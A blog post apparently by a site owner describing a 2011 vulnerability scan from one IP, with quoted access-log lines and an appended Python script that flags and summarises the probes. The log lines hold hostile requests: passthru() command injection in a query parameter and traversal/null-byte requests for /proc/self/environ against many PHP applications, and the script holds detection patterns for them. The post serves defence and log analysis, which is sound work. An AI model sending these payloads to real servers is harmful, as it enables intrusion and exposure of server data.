58.63.241.209 knocking on the door.

I see a few visitors who are looking for weaknesses on most of my domains daily.
Usually a few lines like “admin/banner_manager.php/login.php” during a few seconds.
This one was a bit more “intense” than usual, +1100 lines in the log and it lasted for +13 minutes.
It came from the IP 58.63.241.209 (China), looking for weaknesses to exploit, “proc/self/environ%00”.

I see Joomla clearly in there, but whether the rest of the hits are all related to Joomla, I don’t know.
I suspect this is an intended “box opener” looking for weaknesses in various possible installs, but I have very limited knowledge of this.

58.63.241.209 is known from before, see e.g. http://www.dshield.org/ipdetails.html?ip=58.63.241.209

The first few lines are below; see the attached .txt-file (.txt is now allowed?) / .odt-file if you are interested in the rest.

[29/Dec/2011:04:06:48 -0500] "GET /pics/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:48 -0500] "GET /images/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:49 -0500] "GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /img/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /photo/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photos/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /pic/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:54 -0500] "GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:54 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /include/new-visitor.inc.php?lvc_include_dir=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:56 -0500] "GET /cpcommerce/_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /eblog/blog.inc.php?xoopsConfig[xoops_url]=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /pm/lib.inc.php?pm_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /includes/include_once.php?include_file=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:07:00 -0500] "GET /e107/e107_handlers/secure_img_render.php?p=../../../../../../../proc/self/environ%00

58.0.0.0/7 was already in .htaccess.
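The probes in the excerpt share a few recognisable traits: a directory-traversal path ending in proc/self/environ, a %00 null byte, and a PHP passthru() call smuggled into a query parameter. As an added example (not part of the original post), here is a small Python script that pulls those signatures out of Apache combined-format log lines, groups the hits by source IP and reports how long the scan lasted. The sample lines are constructed in the same shape as the excerpt; the excerpt itself omits the client IP column, so the post's 58.63.241.209 is filled in for the constructed lines.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed sample in the shape of the post's excerpt (IP column added; the
# 192.0.2.10 line is a benign request that should not be flagged).
SAMPLE_LOG = """\
58.63.241.209 - - [29/Dec/2011:04:06:48 -0500] "GET /pics/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 212
58.63.241.209 - - [29/Dec/2011:04:06:54 -0500] "GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212
58.63.241.209 - - [29/Dec/2011:04:07:00 -0500] "GET /e107/e107_handlers/secure_img_render.php?p=../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212
192.0.2.10 - - [29/Dec/2011:04:07:01 -0500] "GET /index.php HTTP/1.1" 200 5120
"""

# Apache combined format: ip ident user [timestamp] "METHOD target PROTO" ...
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)')

# Probe signatures, applied to the URL-decoded request target so that
# %00 and %27 are seen as the bytes the scanner actually sends.
SIGNATURES = {
    "lfi_proc_environ": re.compile(r"(\.\./)+.*proc/self/environ", re.I),
    "null_byte": re.compile(r"\x00"),
    "php_passthru": re.compile(r"passthru\s*\(", re.I),
}

def classify(target):
    """Return the names of every signature that matches the decoded target."""
    decoded = unquote(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def summarize(log_text):
    """Group flagged requests by source IP: hit count, signatures seen, scan duration."""
    per_ip = defaultdict(lambda: {"hits": 0, "tags": set(), "first": None, "last": None})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                     # not a parseable access-log line
        tags = classify(m["target"])
        if not tags:
            continue                     # ordinary request, nothing to report
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        rec = per_ip[m["ip"]]
        rec["hits"] += 1
        rec["tags"].update(tags)
        rec["first"] = ts if rec["first"] is None else min(rec["first"], ts)
        rec["last"] = ts if rec["last"] is None else max(rec["last"], ts)
    return {ip: {"hits": r["hits"], "tags": sorted(r["tags"]),
                 "duration_s": int((r["last"] - r["first"]).total_seconds())}
            for ip, r in per_ip.items()}

if __name__ == "__main__":
    for ip, rec in summarize(SAMPLE_LOG).items():
        print(ip, rec)
```

Point the script at a real access log and the same summary gives you the per-IP hit count and duration the post reports by hand (+1100 lines, +13 minutes), which is a reasonable threshold for an automatic block.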

Posted in hackers.